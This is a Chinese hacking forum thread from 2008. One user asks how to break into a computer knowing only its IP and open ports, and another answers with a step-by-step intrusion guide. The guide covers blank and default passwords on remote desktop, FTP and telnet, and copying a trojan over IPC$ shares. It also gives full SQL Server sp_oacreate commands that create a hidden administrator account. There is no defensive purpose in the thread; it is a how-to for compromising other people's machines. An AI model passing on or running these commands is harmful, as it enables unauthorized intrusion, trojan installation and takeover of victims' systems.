标题:
[讨论]
知道ip,及端口,入侵电脑
[打印本页]
作者:
gyyq2002
时间:
2008-2-8 17:32
标题:
知道ip,及端口,入侵电脑
知道ip地址,及使用的端口如何入侵,电脑,请指教!
作者:
xiaocan147
时间:
2008-2-9 21:48
嘿嘿 我是新来这个论坛的。
我的第一篇帖子就是帮助人的,太好了。。。
知道IP和端口后,就可以尝试着入侵了,
如果是3389端口的话,用远程桌面连接他,帐号administrator,密码空看看能不能连接。
也可以试着按5下shift,是否弹出资源管理器
如果开了21端口,就尝试用FTP连接他,帐号密码先用空的试试,也可以用admin来试试。
如果开了23端口,就用telnet连接他,帐号administrator,密码空,或者密码123456等等试试能否连接,能的话就下载木马。。。
如果开了135,445之类的端口,而且开放了共享,那就用命令
net use \\对方的IP\IPC$ "" /user:"admintitrator" 连接上去,连接成功后用命令copy 木马.exe \\对方IP\c$ ,就可以把木马复制到对方的C盘共享了。
如果开放了1433端口,就可以用X-scan扫描对方IP,看看是否有弱口令,如果有就用查询分析器来连接,在用SQL语句: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add' 添加一个用户,一般来说开了1433的用户是网站服务器那样的,也就开了远程桌面,就可以用新加的帐号密码来连接他了。
1433端口也可以用sqlhello来溢出入侵得到cmdshell....
如果开了80端口的话,一般就是网站服务器了,就去
http://ips.syue.com
输入IP,查询他服务器的网站,在入侵网站后进行提权。
如果服务器是jsp的话,可能tomcat还有其他漏洞,也可以进行进一步入侵,考虑到楼主可能是初学,我就不在说下去了。
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2